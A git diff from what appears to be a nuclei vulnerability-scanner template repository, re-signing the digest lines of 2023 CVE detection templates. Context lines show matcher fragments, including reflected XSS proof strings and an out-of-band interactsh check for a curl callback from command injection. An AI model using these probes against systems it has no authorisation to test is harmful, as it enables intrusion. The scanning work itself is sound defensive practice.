490a0046304402205451db383786918c1f14b6751c0ffaeb263600bab8cc76dc938cf3e1847531b902203c9a566e2f17d7cd2501e5dad53491de15f0dcbe0b569a5be1a41ca489e8b894:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bf8e9a00df0f8377907f2df5438b99e4a3d36b85f2938b25de0dc3ae5fa9abab022100f49f5afc99d134805292ba1c0c1f07dc7da7076b0bf9292863ecccbb80e562f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0942.yaml b/http/cves/2023/CVE-2023-0942.yaml index 2022d1e92d..2cb5dfbf36 100644 --- a/http/cves/2023/CVE-2023-0942.yaml +++ b/http/cves/2023/CVE-2023-0942.yaml @@ -49,4 +49,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "") && contains(body_2, "woocommerce-for-japan")' condition: and -# digest: 4a0a0047304502205a6154be3977335b0b6a8edafe8ebf0cdc8be8592b0dde724b514055ced4fc0e022100935f1df2f35df2ff8160527c45087dc5c1a387351a1dcc8ea9fea63d30041d53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204678900739d421af66218eedfb37d3b4faaec14cc9fab315b639805bbe64fb4602203c9b3d648bcf22dbded8fe022042b2eda178e4baee5ae3b293cc8ca90ae43cc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0947.yaml b/http/cves/2023/CVE-2023-0947.yaml index 1562c76f9c..a769e1f62d 100644 --- a/http/cves/2023/CVE-2023-0947.yaml +++ b/http/cves/2023/CVE-2023-0947.yaml @@ -40,4 +40,4 @@ http: - 'status_code == 200' - 'contains(body, "Index of /fp-content")' condition: and -# digest: 4a0a00473045022100a6fad072aa7b7a33eeb7febfa517c81a87cdd0458f78e659f4436d97e14cda8c02201122c5d07ec27092761f1e6d267c54e6cd56b9d6df20fe247ee60f0783601bd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206ac68e76b7d1b80590fce76a7c334d02683e8f5685f3f00ca00d482a705fca06022100a542a7ce222beaa5b850215fc76bce92f218fda6a243cf87ddd630934f1c2d8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0948.yaml b/http/cves/2023/CVE-2023-0948.yaml index 1066b76c09..b2e40f87fb 100644 --- a/http/cves/2023/CVE-2023-0948.yaml +++ b/http/cves/2023/CVE-2023-0948.yaml @@ -49,4 +49,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "peachpay")' condition: and -# digest: 4a0a0047304502207489300b27fc604ebc086d2dcf53a066f713bf6e155fc3d7e796b5d5e7073f41022100d763b61ecc36c48a60e65fcac863f65fb4d354916e78aef5854c9720707c38f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c1cae439df45cc5bf67cfc667a3d7e01b5f8cc44e84fedccebcb6e48d61a6f4c02202ba183314bba02b3e24a222a89825f4d79dd91838f02f1e7742ff2f7b1809bcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0968.yaml b/http/cves/2023/CVE-2023-0968.yaml index f011262b94..609294ad2e 100644 --- a/http/cves/2023/CVE-2023-0968.yaml +++ b/http/cves/2023/CVE-2023-0968.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "/onmouseover=alert(document.domain)//")' - 'contains(body_2, "Watu Quizzes")' condition: and -# digest: 490a004630440220101a9d9c53b24a7571530b23ae247be38f0e4664af24681277fdacfd89e411ce02206695c9ba4925e33fea75684fa188a7bbe650cbebaa6750343535fa6fa8939a43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008a17dec616c53559bea67a8cd4735a918b0217d5fd3ab3177fe5a9654a563107022100dc1d6eb7ac19aab44743cb8a942958603e5520ae7675897d1a3e156197cb02b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1020.yaml b/http/cves/2023/CVE-2023-1020.yaml index ba432b2d8a..d024d70cb2 100644 --- a/http/cves/2023/CVE-2023-1020.yaml +++ b/http/cves/2023/CVE-2023-1020.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fac5c85ebe071ae5ef03e6745f869794a516d4dd1a7fd22f58ec3d490039c84c022100cafea571a15f3be63d57818f9c9386f1433fe77561b33395aeb30cde8b682100:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f60074afcba18d8329031644df56f875059e5aefdb617ace5a99a590058c3559022100ba696ebc5b28984c6d315cdb803ba38a639adbbc9a02e39f35bd051ca3dc72ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1080.yaml b/http/cves/2023/CVE-2023-1080.yaml index 5308f6b506..dec84e5f9e 100644 --- a/http/cves/2023/CVE-2023-1080.yaml +++ b/http/cves/2023/CVE-2023-1080.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "/ onmouseover=alert(document.domain);//")' - 'contains(body_2, "GN Publisher")' condition: and -# digest: 4b0a004830460221009e1ffc42fadc2223a2bde2cfca3d21b2ccb40f02c1ccf27a1ded4325da215dfb022100fd1a246c50613256dcd59279b3f0ea4fcde05ce171adfeabd1d5068a35986ed9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202b609b4ae1aa40731a8add9877fadcbf435ea7adc7aa46ba176951fe72d3d805022003ef448a0c5dbea69b1438ad3eb0dc481a9eb42ce5eeaf882e68c97f64112fe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1177.yaml b/http/cves/2023/CVE-2023-1177.yaml index 6030f84805..6ba483e3de 100644 --- a/http/cves/2023/CVE-2023-1177.yaml +++ b/http/cves/2023/CVE-2023-1177.yaml @@ -70,4 +70,4 @@ http: - '"version": "([0-9.]+)",' internal: true part: body -# digest: 4b0a00483046022100d755ca22bd1d15b3e2037d22374fbe60d7b1db9c35cc6a4cad95e1b57c88d42a022100c8c05dd9d1b11648b906d574c3f74255eabdd64d0283c45bb8dac0ee7c66c3cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022056f9bdb16ccb00b5dd4fa12e9eba4ca7d7e939c843f667b4581165ca69a847f202200e0f376f456a995535eaf668ed23e5d6128f81e7cde97308346a4aea04bef498:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1263.yaml b/http/cves/2023/CVE-2023-1263.yaml index 25f19d2e58..814427cadc 100644 --- a/http/cves/2023/CVE-2023-1263.yaml +++ b/http/cves/2023/CVE-2023-1263.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022011e5f903b0a93f9e3c06ec147cc8c3f99a9d83b16945cc273a867de1c81ea74e0221009f399c551bcf521294a213c1b973399eb02bea51059fdf559b11acf56aff52ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220094fcdf2f6773c8f431e3472cbc4ce5762d7fb4ecfa31abf8da8b6fb4d75b76a02206c444bd2a1756955ffe195a995bd222948a0ea6d6e9b2441791be9c3f4790a4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1362.yaml b/http/cves/2023/CVE-2023-1362.yaml index e7c3986772..32a25945e7 100644 --- a/http/cves/2023/CVE-2023-1362.yaml +++ b/http/cves/2023/CVE-2023-1362.yaml @@ -42,4 +42,4 @@ http: - "!regex('X-Frame-Options', header)" - "contains(body, 'BUMSys
')" condition: and -# digest: 4b0a00483046022100db736e1f7e3b60b5cdc1776b06c2485456e5878e8fb3742146e4e593eeaa3f95022100f0fbea2cbfdb563686635b04f3c66d63dc0874d5c884e91e104af6118f8f9deb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008a79a4ec7e3c4d6be37f81281c4648dae38737c877092a9d257e5b92b0924c4c02200a020bcf923115f3cf0bf8cd32bfee8d459ab0cbef61231a5e381ba9cafca072:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1408.yaml b/http/cves/2023/CVE-2023-1408.yaml index 5b16ee7d47..d62b8d443c 100644 --- a/http/cves/2023/CVE-2023-1408.yaml +++ b/http/cves/2023/CVE-2023-1408.yaml @@ -50,4 +50,4 @@ http: - 'status_code_2 == 200' - 'contains_all(body_2, "Edit Video","Youtube")' condition: and -# digest: 490a004630440220557189f3aeda3c74e23c7c2eafca9a9ffd0d874f4c21f4998f0fa7da5b3d34390220535b42e7ed0a6ca565fbab863cb242ca58ab68d291a3470b7e8c5d54ebf0de30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b5d3d69f571fab56226ee2efc6bf4ad52536adaebc6bc8da1207f7a70d57015a02203f78d2503ccf987c7dc76ae921a1e764d243158a2e833517f6d4585f4ff3d0e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1454.yaml b/http/cves/2023/CVE-2023-1454.yaml index 13e02aa8e0..0188d9aaf2 100644 --- a/http/cves/2023/CVE-2023-1454.yaml +++ b/http/cves/2023/CVE-2023-1454.yaml @@ -68,4 +68,4 @@ http: - "XPATH syntax error: '([a-z- @%]+)'" - "XPATH syntax error: '([a-z@%0-9.]+)'" part: body -# digest: 490a0046304402201617c97220bd0ac605e36efc6731e6e680ab819a2d613804423de883aba8d1eb0220562bcbd34db0c1ce70cd835193e6819e76e7cef2925feda6621420165482860b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ae1a4096256e2a1c9542f440f000332fa0ba7ca07eb5425181f24e1083029ef4022068683c471f87d8e1566ef6a368e833b5e5caa8d0579c03aa83e07c89614345ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1496.yaml b/http/cves/2023/CVE-2023-1496.yaml index 85951132a0..ca70240103 100644 --- a/http/cves/2023/CVE-2023-1496.yaml +++ b/http/cves/2023/CVE-2023-1496.yaml @@ -44,4 +44,4 @@ http: - type: dsl dsl: - content_security_policy -# digest: 4a0a0047304502202ad789f0ac262a3012d88a82fabcb0495918466b6945c80a40a9cf0f17501756022100fcd6b4965a63afc6ed0a5933664366f832ca12cc04bd2e4809dbd1fec88dc51b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022030093375e39a5d0e186176cbda26b99b4f2d9b98da7caf82f840983068846982022050711347eca3508bdbc51f4e2785386976f7c0c935a3a2a1f0651f6806dc8019:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1546.yaml b/http/cves/2023/CVE-2023-1546.yaml index 1c2ba9143e..9e6b35eb69 100644 --- a/http/cves/2023/CVE-2023-1546.yaml +++ b/http/cves/2023/CVE-2023-1546.yaml @@ -48,4 +48,4 @@ http: - 'contains(body_2, "scriptalert(/XSS/)/script")' - 'contains(body_2, "mycryptocheckout")' condition: and -# digest: 490a00463044022018d8d859d1510e71d41e4dcab2713a5820907e67c0445dd0ecdb4500c0fa6b730220327729b1610301143ba6cbd8037ecece03bc57e6fcd4ce7118478ec6102d864a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a5543a3c7f138537869158794cc19d7e7cf4177118b7829488b5a952c0c3b2bc02204e68af118f9d1ace75a15952a8bdb5cfb5aaeb7443589b3cbaf1e2528b5f8821:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1671.yaml b/http/cves/2023/CVE-2023-1671.yaml index c619736526..e49467e9c9 100644 --- a/http/cves/2023/CVE-2023-1671.yaml +++ b/http/cves/2023/CVE-2023-1671.yaml @@ -54,4 +54,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4a0a00473045022100ae0e465ec75fd0a4861424e3aad7f02640cf6221038527efafe82c6742e6737002206c97e80f7b304f7c6b2617847d8a6c3bc6133ac27161b8921c0781f00317ca0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220072b65d71510b1634861b941e61475482be1ba0838781257678f74617cbb62b702202d1edc88fa42eea9bfacbaee660087313a77e0dfb93cd9d2198a1198cfc173d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1698.yaml b/http/cves/2023/CVE-2023-1698.yaml index 01496b488e..ce1af8b645 100644 --- a/http/cves/2023/CVE-2023-1698.yaml +++ b/http/cves/2023/CVE-2023-1698.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b407d13bb092bfd293626f93b9765b760fc504f78be29190689950f60041a7bf02200e23d21826874028db946e7c4a4af5e0b05de0bed54232eb4b63c39eb70fe3aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009328b8cfdfa07c19005e8c785f33971030b1e69f80497f0678af09446cff35b7022044197fa263ddc6abed937608a3484fad2d8e6dc30f37abe7d0c5b1d5b669fae9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1719.yaml b/http/cves/2023/CVE-2023-1719.yaml index f46619f25a..268e7d9d18 100644 --- a/http/cves/2023/CVE-2023-1719.yaml +++ b/http/cves/2023/CVE-2023-1719.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ee017b54c73c0f61455fa03bda991d45a439666dd9865e87ae61054c61089562022036a61ac1c74ee4bdc735c1e9d6eedb6e2c5cb5f2df88ed4c4e65875d66e4f091:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220038ee01fa9935d03a32a3a7470cca7c217ac7b63f63a30c0af062298fc4dfb2602206e8e49ba9bb685d8b9d999dae8c61a2f6b2ebc1eaddaa14d1efea7fc06364779:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml index f48e1c9796..fcc7040049 100644 --- a/http/cves/2023/CVE-2023-1730.yaml +++ b/http/cves/2023/CVE-2023-1730.yaml @@ -44,4 +44,4 @@ http: - 'status_code == 200' - 'contains(body, "supportcandy")' condition: and -# digest: 4a0a00473045022100b8f43200f81783f187365c589653ad29a2050ba46a41782681ecc57fbfed6942022017518deb0c7150bec65b058cc0687e118acd14f0c54396df0e503dfb9ccdf33a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a7f2d28c6bf94595593025ec52e5895af660c64274a689070f34e319f39889ec022073bba0fe01da7629b66e32798c46291975535b829e30ced65d1cbbe3c4e26711:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1780.yaml b/http/cves/2023/CVE-2023-1780.yaml index 588fb35ccd..9297459d82 100644 --- a/http/cves/2023/CVE-2023-1780.yaml +++ b/http/cves/2023/CVE-2023-1780.yaml @@ -49,4 +49,4 @@ http: - 'contains(body_2, "re not allowed to view")' - 'contains(body_2, "")' condition: and -# digest: 4a0a00473045022037fd184a30baa4bf9c5bead97935ec384efbce6d629f36e79fdc4a6f96c2a5d0022100fdeb0ca8f655e4f1856990096615ff0c35961dd2dea9984283364c1c0c9cc6ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022008f87555ca75fc4939314686cecddcc71066602938b9bbf9da682d91e537f6d5022050d03ebc2a2b1a35203a8af4d8add66270d5994ead2582668875a3e8b2184673:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml index fa2ae0923a..c61f3dbeda 100644 --- a/http/cves/2023/CVE-2023-1835.yaml +++ b/http/cves/2023/CVE-2023-1835.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Ninja Forms")' condition: and -# digest: 4b0a00483046022100e5e7a1e57dcb12a58b14088fffc8b645c336e75e181bb9e86ad3afa2cd124f16022100b7094b86bf5ee74099a6da69ea87a76394fbb02765149b058c67daca7ac66a1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022045f3a95c176c2addf7bb4c7bb971f457459a9df823820444024086732be71dbd0221008825780a2ce7eaa87319fb76035339a15ec592a9d62c12f41f8a8b6be8776d3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1880.yaml b/http/cves/2023/CVE-2023-1880.yaml index 7fb02e0450..7144b5649d 100644 --- a/http/cves/2023/CVE-2023-1880.yaml +++ b/http/cves/2023/CVE-2023-1880.yaml @@ -40,4 +40,4 @@ http: - 'contains(body, "phpmyfaq") && contains(body, "")' - 'contains(content_type, "text/html")' condition: and -# digest: 490a0046304402205b480a371ae035c47014eec72651c9396eb2f4cbb16cef0e087536bdb0401ade02203534bd6903549f0f9c3753092efb1d6cdf4adda76ba68f6fd7ab8557a659d271:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207503b527466102b06d1c2f395825c0aca20799fada79e374c81107610a59fd5b0221009a08b4c9cc566145837f677b18194b727a2de191f337726664826007510b98ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1890.yaml b/http/cves/2023/CVE-2023-1890.yaml index 0f60b833ad..7820aac1f1 100644 --- a/http/cves/2023/CVE-2023-1890.yaml +++ b/http/cves/2023/CVE-2023-1890.yaml @@ -49,4 +49,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "tablesome")' condition: and -# digest: 4a0a00473045022100d4ea7f06a84e16fe857d3fb6c8b915ddd7c277fa55d2b0b7341954486290763502202b6315a3b0fea762b9c94cf5ce30c251a14e7b0ac555ad55dad8d54b799b841d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205dac386f1ddec8300f0a7c85361f7480cbc306df48e2ff420beedd4ee5e4850202210092a8e9a1101576570f1511930badc76b41235ab03f7b1227608718ee48148d52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1892.yaml b/http/cves/2023/CVE-2023-1892.yaml index b645cbf988..83b1cc6592 100644 --- a/http/cves/2023/CVE-2023-1892.yaml +++ b/http/cves/2023/CVE-2023-1892.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220709cb3b14207ada2e026411d050b57c58e1f48f91202bb50481bf3ba342b32bf022016e81e67e363424bb053a774a26a9f93bc8f50bbb22ef7fc04d365e716c763ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203c298fb5462949d2c0b4c37fe2b6f43a82cf04f52f0d463d2683e836bb1d02b2022100d3a58d90f4dead648a4149fffad2b4862828a2de55ca75a95ad4cf78b4ae40f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20073.yaml b/http/cves/2023/CVE-2023-20073.yaml index abb4f85238..468f790506 100644 --- a/http/cves/2023/CVE-2023-20073.yaml +++ b/http/cves/2023/CVE-2023-20073.yaml @@ -80,4 +80,4 @@ http: part: body_3 words: - "{{html_comment}}" -# digest: 4a0a0047304502203543e37991008a86e6d6545f9b12ce7a9569148a72e2b69c5590d5a736a674cd022100c607440c608f5ca67437751859806a3700c511f68f54f71ac8f50a63b0335fea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200ecacf409865531df27981f30bbbeb4ea2c9feacbcb8c957049c6b37b2f6e08d02205f9b37f3cc2bd352168298cd1775310eb1fb0ee10efe1c5f210b6b41b7b603e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2009.yaml b/http/cves/2023/CVE-2023-2009.yaml index c026ccc8b8..2583aa00c9 100644 --- a/http/cves/2023/CVE-2023-2009.yaml +++ b/http/cves/2023/CVE-2023-2009.yaml @@ -61,4 +61,4 @@ http: group: 1 regex: - 'name="_wpnonce" value="([0-9a-z]+)" />' -# digest: 4a0a004730450221008d6f1b11e38f9c8eefd91b79603bf5b7eb468702c923563b993e1ba8bc58a3e502203dfa0040b3fad85659dd26b3941e38eed7bd7a42b71ad9e85a926a7a37f318ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c6f372018946b3beaebd415920a5e6d1d8e71304811c3e7a1c1222e5e7a86604022012cbef1c55c540370121766fc643289378a91577e7f87e46421634f256235c7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2023.yaml b/http/cves/2023/CVE-2023-2023.yaml index 13fa0f3d0d..b9e6b6dc4d 100644 --- a/http/cves/2023/CVE-2023-2023.yaml +++ b/http/cves/2023/CVE-2023-2023.yaml @@ -51,4 +51,4 @@ http: - contains(body_2, "onanimationstart=alert(document.domain)//") - contains(body_2, "Custom 404 Pro") condition: and -# digest: 4a0a00473045022100cd38bff86e643f91db88d9a1590d35b1839285be73b6dbc31c8f0b1ad50f57020220594ae2e7d9f3dbf289a732848e92543eb02be8752b29df3f8de781957d536475:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ffbdca1dcfe309a8d8b09ff9fadc17e0082cd9a9841a9576be790a6570c9cffb022100bb9aa9a7bd2885181381d4c61929384437cb98432da45a3d913dd03bc1fdf7bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2059.yaml b/http/cves/2023/CVE-2023-2059.yaml index d0b1f9cc3e..8bf8628411 100644 --- a/http/cves/2023/CVE-2023-2059.yaml +++ b/http/cves/2023/CVE-2023-2059.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022011648b7817f4854aa279b9f331d26ac1f4c03e23eca21457ee72d3397588b7140220513fe0ffaebd0415deced1853ffb70ac950380da12a680d10e4be106aa47913a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200b78b70e35d7ae097b09444766c14d99558d97b9a988c68a33b2ef51f72d18bd0221009ed5a6d532cd23a04171350e21b4c0a4a8da0f3519b0a3c50468f0cd49521398:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20864.yaml b/http/cves/2023/CVE-2023-20864.yaml index 8c6a99bf46..e9557df7b7 100644 --- a/http/cves/2023/CVE-2023-20864.yaml +++ b/http/cves/2023/CVE-2023-20864.yaml @@ -65,4 +65,4 @@ http: internal: true kval: - "X_CSRF_Token" -# digest: 4b0a00483046022100d81a1f67f8e41f50b8995bae686ab49b507ce0fa2517c60658b8ac8630d9871a022100def2a9f72d0bdacf1fba5cc1236dac40a103ff7edb620cff13fc41f501660326:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220217a4161f5d33b558b5e1a5f9cc3022399c2917d68142b7efd0cbc2bef5b9416022021067a8d5837587fcb3fd09cd0f9a8687351646f3756e6dc7b47e1093c686c2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20887.yaml b/http/cves/2023/CVE-2023-20887.yaml index ac840d783e..7821e0fcf0 100644 --- a/http/cves/2023/CVE-2023-20887.yaml +++ b/http/cves/2023/CVE-2023-20887.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cef3e5e34cd635c23cf32fc104b9c643bc4b812046fc3e8ab1f2e0237b0c98c6022041d25ffbcfc8ed708d8e3cce28043e53ef71343b3a31238d065ba9f7e9d0f22a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220078674432fdbe4bcc3e9ae1cfbf13e4a96cf8e8a8c453600e3aff2da336e476e022100a0b4931ccdeaef487fa74cef44cd586f54177eb42f22c5344d688b35a272fc15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20888.yaml b/http/cves/2023/CVE-2023-20888.yaml index 9266fed72d..de873a4c1c 100644 --- a/http/cves/2023/CVE-2023-20888.yaml +++ b/http/cves/2023/CVE-2023-20888.yaml @@ -67,4 +67,4 @@ http: - 'csrfToken":"([a-z0-9A-Z/+=]+)"' internal: true part: body -# digest: 4a0a00473045022100fe3fd06bbd0a82bf33a0611564f97011c559e4cb49524a0a37df553c037ab05f02205cd1eae8785402529378a446c8007225d04aa7f647bb94f439d1b8dc33ab27db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022004659117a94dd175c3f64942542c9f5c70bd990758add2155a9a819489465fb8022100dabf13a217b43a0cc4c1e51d04df3d0a23ea6c8acdf50ea4f6d42e386d13c7d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20889.yaml b/http/cves/2023/CVE-2023-20889.yaml index 979a90e51f..26c0802963 100644 --- a/http/cves/2023/CVE-2023-20889.yaml +++ b/http/cves/2023/CVE-2023-20889.yaml @@ -88,4 +88,4 @@ http: - csrfToken":"([a-z0-9A-Z/+=]+)" internal: true part: body -# digest: 4a0a004730450221008a1f0e02f6eac19878f28e73d5af976689cb0985da1e466a9ec0ec62c50c490002205fb72bf2476805961a6bb628582a35b82e6ae23650edd78967e82247099c3308:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022055b10fc56ee43cdb8ca9c694251abb76a7705cdcbede4f4f70fdcf5571f7a5b502201c3ab21258337ff42f17b2eefe0b93936df34bf1675d361b0c5d3e3f634bf301:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2122.yaml b/http/cves/2023/CVE-2023-2122.yaml index bfeaa51bfe..6985485ce7 100644 --- a/http/cves/2023/CVE-2023-2122.yaml +++ b/http/cves/2023/CVE-2023-2122.yaml @@ -47,4 +47,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Image optimizer")' condition: and -# digest: 490a0046304402205fa4a6a8bcbf2bab629155a7f4d02eb527d8635fd7393c5f399f423ee4cf8557022004a188c53439a2e745d2c34e4e734f4bf64d17d500314d2585f1a7c94badc180:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ff7eec23d31c4531488ff4f882dea2d85dc65b726ccc6fa85783372d799fce38022100acd0f707b454a6339756cba8d26a33028d885b6b685c2c6c4c2757babac9e5c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2130.yaml b/http/cves/2023/CVE-2023-2130.yaml index 0e5d746ec9..6056d6df45 100644 --- a/http/cves/2023/CVE-2023-2130.yaml +++ b/http/cves/2023/CVE-2023-2130.yaml @@ -44,4 +44,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "Supplier Name")' condition: and -# digest: 4a0a0047304502207610615b4d86f3776d899e52606e2d73d1e13ab8f1be83473221d6e08f7d7ac6022100c166cf185ded4ffb6629ece50af08cbb3480f06e618e633086ebf6bf5b2de618:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008eedd613cb556e22c44c4adb41769b57907a6fc43c8de121b942339738e6bb6102210093d2e29ef6542d0d18cc3e9a1cbedf51462c61250e47f1a3ed1e83f009a3052e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2178.yaml b/http/cves/2023/CVE-2023-2178.yaml index 1542ee4351..e1f8bdd6b9 100644 --- a/http/cves/2023/CVE-2023-2178.yaml +++ b/http/cves/2023/CVE-2023-2178.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, ">")' - 'contains(body_2, "page_aajoda-testimonials")' condition: and -# digest: 4a0a00473045022100c74aeac54fc01cd88a31d603a084a840be0d2f754b0ef7b7bdebe414e15f8a8902201f30b83a2348f3b8479b1ff813a3d43c0d3e753579da02c956e300a33f94eb5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a8e5a63e79c6b4ec11e580b7171aeb1565b9cea7a93e3f3b319c86f146b988f4022100837c8e9be1ea6bfa4b45912eb8c52e27444309294181ba829334a2b88b5e84cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22232.yaml b/http/cves/2023/CVE-2023-22232.yaml index f6a39ea7ba..701aa352e2 100644 --- a/http/cves/2023/CVE-2023-22232.yaml +++ b/http/cves/2023/CVE-2023-22232.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d2644b825543fc67f02663f2acb50beba0821a8bfc2bc784906c2212b716c165022100fbf55e2f84b2a12206b0c96e16aa7f81405c4f6d3e40e73fbd909f2a5deb5583:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206f2592d7f4a8f1ad6d2b193ebd92421aa8ce79cced2f737da59684c8d24fb431022100ea7fc81dac4971b7982afcaf1ee0f57bb291278076a22670eb8cc511b40fbe2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2224.yaml b/http/cves/2023/CVE-2023-2224.yaml index 35dfc7eedd..fa1d8fe4ce 100644 --- a/http/cves/2023/CVE-2023-2224.yaml +++ b/http/cves/2023/CVE-2023-2224.yaml @@ -68,4 +68,4 @@ http: regex: - 'name="nonce_wdseo" value="([a-z0-9]+)" \/>' internal: true -# digest: 